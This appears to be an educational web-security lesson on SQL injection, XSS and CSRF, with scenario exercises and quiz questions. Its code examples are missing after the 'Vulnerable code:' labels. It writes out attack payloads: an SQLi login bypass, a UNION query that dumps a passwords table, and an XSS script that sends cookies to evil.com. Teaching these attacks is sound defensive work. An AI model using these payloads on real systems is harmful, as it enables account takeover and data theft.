Every time you visit a website, your browser sends an HTTP request to a server, which responds with HTML, CSS, and JavaScript. But what happens between the request and response — and what happens when that process is exploited?
SQLi occurs when user input is directly concatenated into SQL queries. Attackers can bypass authentication, extract data, or even drop tables.
Vulnerable code:
Payload: ' OR 1=1 -- bypasses authentication entirely.
XSS lets attackers inject malicious scripts into web pages viewed by others. Stored XSS saves the payload on the server; Reflected XSS delivers it through a crafted link.
Vulnerable code:
Payload: <script>document.location='https://evil.com/?c='+document.cookie</script>
CSRF tricks an authenticated user into performing actions they didn't intend — like changing their email or transferring funds — by embedding a forged request in an image or link.
If the user is logged in, the browser automatically includes their session cookie.
Read each scenario and identify which OWASP Top 10 vulnerability is being described:
Scenario A: An attacker submits a review on an e-commerce site. When other users view the review page, a script steals their session cookies.
Scenario B: A logged-in user clicks a link that silently changes their account email address because the request is automatically authenticated.
Scenario C: An attacker enters ' UNION SELECT * FROM passwords -- into a login form and dumps the entire user table.
Design a comprehensive security checklist for deploying a production web application. Cover at least eight categories:
1. Which attack injects malicious scripts into a web page viewed by others?
2. What is the best defence against SQL injection?
3. CSRF exploits which feature of HTTP?